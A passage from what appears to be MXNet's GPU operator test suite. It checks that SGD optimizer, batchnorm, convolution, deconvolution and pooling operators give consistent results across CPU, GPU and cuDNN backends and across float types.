*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
@pytest.mark.serial
def test_batchnorm_with_type():
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
@pytest.mark.serial
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
@pytest.mark.serial
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
@pytest.mark.serial
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
tol = 1e-1
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=tol)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@pytest.mark.skip(reason="skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in [1, 2]:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print("Starting engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print("Finished engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
@pytest.mark.serial
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
@pytest.mark.serial
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
@pytest.mark.serial
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
@pytest.mark.serial
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
@pytest.mark.serial
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
